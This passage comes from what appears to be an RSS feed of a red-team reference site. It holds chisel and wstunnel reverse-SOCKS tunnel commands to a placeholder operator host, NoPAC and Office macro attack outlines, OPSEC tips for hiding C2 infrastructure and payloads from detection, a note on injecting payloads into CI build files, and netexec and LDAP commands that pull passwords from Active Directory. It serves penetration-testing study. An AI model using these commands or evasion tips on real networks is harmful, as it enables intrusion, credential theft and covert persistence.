&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;wstunnel&lt;/span&gt; &lt;span class="n"&gt;client&lt;/span&gt; &lt;span class="n"&gt;-L&lt;/span&gt; &lt;span class="n"&gt;socks5&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="p"&gt;//&lt;/span&gt;&lt;span class="mf"&gt;127.0&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;0&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="mf"&gt;1&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="mf"&gt;8888&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-connection-min-idle&lt;/span&gt; &lt;span class="mf"&gt;5&lt;/span&gt; &lt;span class="n"&gt;wss&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="p"&gt;//&lt;/span&gt;&lt;span class="n"&gt;myRemoteHost&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="mf"&gt;8080&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;curl &lt;/span&gt;&lt;span class="n"&gt;-x&lt;/span&gt; &lt;span class="n"&gt;socks5h&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="p"&gt;//&lt;/span&gt;&lt;span class="mf"&gt;127.0&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;0&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="mf"&gt;1&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="mf"&gt;8888&lt;/span&gt; &lt;span class="n"&gt;http&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="p"&gt;//&lt;/span&gt;&lt;span class="n"&gt;google&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;com&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="chisel" class="anchored-heading"&gt;chisel&lt;a class="heading-anchor" href="#chisel" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/jpillora/chisel"&gt;jpillora/chisel&lt;/a&gt; - A fast TCP/UDP tunnel over HTTP&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;chisel&lt;/span&gt; &lt;span class="n"&gt;server&lt;/span&gt; &lt;span class="n"&gt;-p&lt;/span&gt; &lt;span class="mf"&gt;8008&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-reverse&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;chisel&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;exe&lt;/span&gt; &lt;span class="n"&gt;client&lt;/span&gt; &lt;span class="n"&gt;YOUR_IP&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="mf"&gt;8008&lt;/span&gt; &lt;span class="n"&gt;R:socks&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="revsocks" class="anchored-heading"&gt;revsocks&lt;a class="heading-anchor" href="#revsocks" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/kost/revsocks"&gt;kost/revsocks&lt;/a&gt; - Reverse SOCKS5 implementation in Go&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Reverse SOCKS using websocket&lt;/p&gt;</description></item><item><title>NoPAC / samAccountName Spoofing</title><link>https://bokkapig.pages.dev/refs/internal/active-directory/cve/nopac/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/active-directory/cve/nopac/</guid><description>&lt;p&gt;During S4U2Self, the KDC will try to append a &amp;lsquo;$&amp;rsquo; to the computer name specified in the TGT, if the computer name is not found.&lt;/p&gt;
&lt;p&gt;An attacker can create a new machine account with the sAMAccountName set to a domain controller&amp;rsquo;s sAMAccountName - without the &amp;lsquo;$&amp;rsquo;.&lt;/p&gt;
&lt;p&gt;For instance, suppose there is a domain controller with a sAMAccountName set to &amp;lsquo;DC$&amp;rsquo;.
An attacker would then create a machine account with the sAMAccountName set to &amp;lsquo;DC&amp;rsquo;.&lt;/p&gt;</description></item><item><title>Office - Attacks</title><link>https://bokkapig.pages.dev/refs/internal/redteam/access/office-attacks/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/redteam/access/office-attacks/</guid><description>&lt;h2 id="summary" class="anchored-heading"&gt;Summary&lt;a class="heading-anchor" href="#summary" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#office-products-features"&gt;Office Products Features&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#office-default-passwords"&gt;Office Default Passwords&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#excel"&gt;Excel&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#xlsm---hot-manchego"&gt;XLSM - Hot Manchego&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#xlm---macrome"&gt;XLM - Macrome&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#xlm-excel-40---sharpshooter"&gt;XLM Excel 4.0 - SharpShooter&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#xlm-excel-40---excelntdonut"&gt;XLM Excel 4.0 - EXCELntDonut&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#xlm-excel-40---exec"&gt;XLM Excel 4.0 - EXEC&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#slk---exec"&gt;SLK - EXEC&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#xll---exec"&gt;XLL - EXEC&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#word"&gt;Word&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#docm---metasploit"&gt;DOCM - Metasploit&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#docm---download-and-execute"&gt;DOCM - Download and Execute&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#docm---macro-creator"&gt;DOCM - Macro Creator&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#docm---c-converted-to-office-vba-macro"&gt;DOCM - C# converted to Office VBA macro&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#docm---vba-wscript"&gt;DOCM - VBA Wscript&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#docm---vba-shell-execute-comment"&gt;DOCM - VBA Shell Execute Comment&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#docm---vba-spawning-via-svchostexe-using-scheduled-task"&gt;DOCM - VBA Spawning via svchost.exe using Scheduled Task&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#docm---wmi-com-functions"&gt;DCOM - WMI COM functions (VBA AMSI)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#docmxlm---macro-pack---macro-and-dde"&gt;DOCM - Macro Pack - Macro and DDE&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#docm---badassmacros"&gt;DOCM - BadAssMacros&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#docm---cactustorch-vba-module"&gt;DOCM - CACTUSTORCH VBA Module&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#docm---mmg-with-custom-dl--exec"&gt;DOCM - MMG with Custom DL + Exec&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#vba-obfuscation"&gt;VBA Obfuscation&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#vba-purging"&gt;VBA Purging&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#officepurge"&gt;OfficePurge&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#evilclippy"&gt;EvilClippy&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#vba---offensive-security-template"&gt;VBA - Offensive Security Template&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#vba---amsi"&gt;VBA - AMSI&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#docx---template-injection"&gt;DOCX - Template Injection&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#docx---dde"&gt;DOCX - DDE&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#visual-studio-tools-for-office-vsto"&gt;Visual Studio Tools for Office (VSTO)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#office-macro-development"&gt;Office Macro Development&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#execute-winapi"&gt;Execute WinAPI&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#references"&gt;References&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="office-products-features" class="anchored-heading"&gt;Office Products Features&lt;a class="heading-anchor" href="#office-products-features" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;figure class="writeup-figure"&gt;
 &lt;img src="https://www.securesystems.de/images/blog/offphish-phishing-revisited-in-2023/Office_documents_feature_overview.png" alt="Overview of features supported by different Office products" loading="lazy" decoding="async"&gt;&lt;figcaption&gt;Overview of features supported by different Office products&lt;/figcaption&gt;&lt;/figure&gt;&lt;h2 id="office-default-passwords" class="anchored-heading"&gt;Office Default Passwords&lt;a class="heading-anchor" href="#office-default-passwords" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;By default, Excel does not set a password when saving a new file. However, some older versions of Excel had a default password that was used if the user did not set a password themselves. The default password was &amp;ldquo;&lt;code&gt;VelvetSweatshop&lt;/code&gt;&amp;rdquo;, and it could be used to open any file that did not have a password set.&lt;/p&gt;</description></item><item><title>OPSEC</title><link>https://bokkapig.pages.dev/refs/internal/redteam/evasion/opsec-fails/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/redteam/evasion/opsec-fails/</guid><description>&lt;h2 id="infrastructure" class="anchored-heading"&gt;Infrastructure&lt;a class="heading-anchor" href="#infrastructure" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;Use generic name for DNS, avoid company names&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Use wildcard (*) when issuing certificates to avoid leaking internal name&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Do not use the default certificates embedded in your C2: &lt;a href="https://www.elastic.co/docs/reference/security/prebuilt-rules/rules/network/command_and_control_cobalt_strike_default_teamserver_cert"&gt;elastic/Default Cobalt Strike Team Server Certificate&lt;/a&gt;, &lt;a href="https://detection.fyi/sigmahq/sigma/network/zeek/zeek_default_cobalt_strike_certificate/"&gt;zeek/zeek_default_cobalt_strike_certificate&lt;/a&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-cs" data-lang="cs"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;event&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;dataset&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;network_traffic&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;tls&lt;/span&gt; &lt;span class="n"&gt;or&lt;/span&gt; &lt;span class="k"&gt;event&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;category&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;network&lt;/span&gt; &lt;span class="n"&gt;or&lt;/span&gt; &lt;span class="n"&gt;network_traffic&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;and&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;tls&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;server&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;hash&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;md5&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="m"&gt;950098276&lt;/span&gt;&lt;span class="n"&gt;A495286EB2A2556FBAB6D83&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;or&lt;/span&gt; &lt;span class="n"&gt;tls&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;server&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;hash&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;sha1&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="m"&gt;6&lt;/span&gt;&lt;span class="n"&gt;ECE5ECE4192683D2D84E25B0BA7E04F9CB7EB7C&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;or&lt;/span&gt; &lt;span class="n"&gt;tls&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;server&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;hash&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;sha256&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="m"&gt;87F2085&lt;/span&gt;&lt;span class="n"&gt;C32B6A2CC709B365F55873E207A9CAA10BFFECF2FD16D3CF9D94D390C&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Disable staging endpoints or restrict the access&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Do not upload your stealthy binaries to VirusTotal or other online scanners&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Guardrails your payload to trigger for a specific user/domain/computer name&lt;/p&gt;</description></item><item><title>Package Managers and Build Files</title><link>https://bokkapig.pages.dev/refs/internal/devops/package-managers/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/devops/package-managers/</guid><description>&lt;blockquote&gt;
&lt;p&gt;Code injections into build files are CI agnostic and therefore they make great targets when you don&amp;rsquo;t know what system builds the repository, or if there are multiple CI&amp;rsquo;s in the process. In the examples below you need to either replace the files with the sample payloads, or inject your own payloads into existing files by editing just a part of them. If the CI builds forked pull requests then your payload may run in the CI.&lt;/p&gt;</description></item><item><title>Password - AD User Comment</title><link>https://bokkapig.pages.dev/refs/internal/active-directory/pwd-comments/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/active-directory/pwd-comments/</guid><description>&lt;p&gt;There are 3-4 fields that seem to be common in most Active Directory schemas: &lt;code&gt;UserPassword&lt;/code&gt;, &lt;code&gt;UnixUserPassword&lt;/code&gt;, &lt;code&gt;unicodePwd&lt;/code&gt; and &lt;code&gt;msSFU30Password&lt;/code&gt;.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;Windows/Linux command&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;bloodyAD&lt;/span&gt; &lt;span class="n"&gt;-u&lt;/span&gt; &lt;span class="n"&gt;user&lt;/span&gt; &lt;span class="n"&gt;-p&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;totoTOTOtoto1234*&amp;#39;&lt;/span&gt; &lt;span class="n"&gt;-d&lt;/span&gt; &lt;span class="n"&gt;crash&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;lab&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-host&lt;/span&gt; &lt;span class="mf"&gt;10.100&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;10&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;5&lt;/span&gt; &lt;span class="n"&gt;get&lt;/span&gt; &lt;span class="n"&gt;search&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-filter&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;(|(userPassword=*)(unixUserPassword=*)(unicodePassword=*)(description=*))&amp;#39;&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-attr&lt;/span&gt; &lt;span class="n"&gt;userPassword&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;unixUserPassword&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;unicodePwd&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;description&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Password in User Description&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;netexec&lt;/span&gt; &lt;span class="n"&gt;ldap&lt;/span&gt; &lt;span class="n"&gt;domain&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;lab&lt;/span&gt; &lt;span class="n"&gt;-u&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;username&amp;#39;&lt;/span&gt; &lt;span class="n"&gt;-p&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;password&amp;#39;&lt;/span&gt; &lt;span class="n"&gt;-M&lt;/span&gt; &lt;span class="nb"&gt;user-desc&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;netexec&lt;/span&gt; &lt;span class="n"&gt;ldap&lt;/span&gt; &lt;span class="mf"&gt;10.0&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;2&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;11&lt;/span&gt; &lt;span class="n"&gt;-u&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;username&amp;#39;&lt;/span&gt; &lt;span class="n"&gt;-p&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;password&amp;#39;&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-kdcHost&lt;/span&gt; &lt;span class="mf"&gt;10.0&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;2&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;11&lt;/span&gt; &lt;span class="n"&gt;-M&lt;/span&gt; &lt;span class="nb"&gt;get-desc&lt;/span&gt;&lt;span class="n"&gt;-users&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;GET-DESC&lt;/span&gt;&lt;span class="p"&gt;...&lt;/span&gt; &lt;span class="mf"&gt;10.0&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;2&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;11&lt;/span&gt; &lt;span class="mf"&gt;389&lt;/span&gt; &lt;span class="n"&gt;dc01&lt;/span&gt; &lt;span class="p"&gt;[+]&lt;/span&gt; &lt;span class="n"&gt;Found&lt;/span&gt; &lt;span class="n"&gt;following&lt;/span&gt; &lt;span class="n"&gt;users&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt; 
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;GET-DESC&lt;/span&gt;&lt;span class="p"&gt;...&lt;/span&gt; &lt;span class="mf"&gt;10.0&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;2&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;11&lt;/span&gt; &lt;span class="mf"&gt;389&lt;/span&gt; &lt;span class="n"&gt;dc01&lt;/span&gt; &lt;span class="n"&gt;User&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="n"&gt;Guest&lt;/span&gt; &lt;span class="n"&gt;description&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;Built-in&lt;/span&gt; &lt;span class="n"&gt;account&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;guest&lt;/span&gt; &lt;span class="n"&gt;access&lt;/span&gt; &lt;span class="n"&gt;to&lt;/span&gt; &lt;span class="n"&gt;the&lt;/span&gt; &lt;span class="n"&gt;computer&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;domain&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;GET-DESC&lt;/span&gt;&lt;span class="p"&gt;...&lt;/span&gt; &lt;span class="mf"&gt;10.0&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;2&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;11&lt;/span&gt; &lt;span class="mf"&gt;389&lt;/span&gt; &lt;span class="n"&gt;dc01&lt;/span&gt; &lt;span class="n"&gt;User&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="n"&gt;krbtgt&lt;/span&gt; &lt;span class="n"&gt;description&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="n"&gt;Key&lt;/span&gt; &lt;span class="n"&gt;Distribution&lt;/span&gt; &lt;span class="n"&gt;Center&lt;/span&gt; &lt;span class="n"&gt;Service&lt;/span&gt; &lt;span class="n"&gt;Account&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Get &lt;code&gt;unixUserPassword&lt;/code&gt; attribute from all users in ldap&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;nxc&lt;/span&gt; &lt;span class="n"&gt;ldap&lt;/span&gt; &lt;span class="mf"&gt;10.10&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;10&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;10&lt;/span&gt; &lt;span class="n"&gt;-u&lt;/span&gt; &lt;span class="n"&gt;user&lt;/span&gt; &lt;span class="n"&gt;-p&lt;/span&gt; &lt;span class="n"&gt;pass&lt;/span&gt; &lt;span class="n"&gt;-M&lt;/span&gt; &lt;span class="nb"&gt;get-unixUserPassword&lt;/span&gt; &lt;span class="n"&gt;-M&lt;/span&gt; &lt;span class="n"&gt;getUserPassword&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Native Powershell command&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;Get-WmiObject&lt;/span&gt; &lt;span class="n"&gt;-Class&lt;/span&gt; &lt;span class="n"&gt;Win32_UserAccount&lt;/span&gt; &lt;span class="n"&gt;-Filter&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;Domain=&amp;#39;COMPANYDOMAIN&amp;#39; AND Disabled=&amp;#39;False&amp;#39;&amp;#34;&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; &lt;span class="nb"&gt;Select &lt;/span&gt;&lt;span class="n"&gt;Name&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;Domain&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;Status&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;LocalAccount&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;AccountType&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;Lockout&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;PasswordRequired&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;PasswordChangeable&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;Description&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;SID&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Dump the Active Directory and &lt;code&gt;grep&lt;/code&gt; the content.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;ldapdomaindump&lt;/span&gt; &lt;span class="n"&gt;-u&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;DOMAIN\john&amp;#39;&lt;/span&gt; &lt;span class="n"&gt;-p&lt;/span&gt; &lt;span class="n"&gt;MyP&lt;/span&gt;&lt;span class="nv"&gt;@ssW0rd&lt;/span&gt; &lt;span class="mf"&gt;10.10&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;10&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;10&lt;/span&gt; &lt;span class="n"&gt;-o&lt;/span&gt; &lt;span class="p"&gt;~/&lt;/span&gt;&lt;span class="n"&gt;Documents&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;AD_DUMP&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>Password - dMSA</title><link>https://bokkapig.pages.dev/refs/internal/active-directory/pwd-read-dmsa/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/active-directory/pwd-read-dmsa/</guid><description>&lt;p&gt;Delegated Managed Service Accounts (dMSAs)&lt;/p&gt;
&lt;h2 id="badsuccessor" class="anchored-heading"&gt;BadSuccessor&lt;a class="heading-anchor" href="#badsuccessor" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;Requirements&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Windows Server 2025 Domain Controller&lt;/li&gt;
